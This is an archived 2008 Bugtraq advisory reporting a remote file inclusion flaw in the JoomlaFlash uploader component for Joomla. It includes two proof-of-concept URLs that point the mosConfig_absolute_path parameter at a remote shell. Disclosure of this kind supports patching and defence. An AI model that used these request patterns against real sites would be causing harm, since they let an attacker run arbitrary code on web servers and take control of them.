[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

JoomlaFlash Component Multiple Remote File Inclusion

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: JoomlaFlash Component Multiple Remote File Inclusion
From: Smasher@xxxxxxxxxxxxxxxxxxxxx
Date: 17 Jan 2008 00:06:03 -0000

Autore: Smasher
Sito: http://warwolfz.altervista.org
Tipo: Remote File Inclusion
Rischio: Alto

A remote attacker can gain access to your website throug a Remote shell 
inclusion.

PoC available:

http://sito.it/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell?

http://sito.it/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell?

Regards.
Smasher

Prev by Date: [SECURITY] [DSA 1465-1] New apt-listchanges packages fix arbitrary code execution
Next by Date: PHPEchoCMS Multible remote vulnerabilitis
Previous by thread: [SECURITY] [DSA 1465-1] New apt-listchanges packages fix arbitrary code execution
Next by thread: PHPEchoCMS Multible remote vulnerabilitis
Index(es):
- Date
- Thread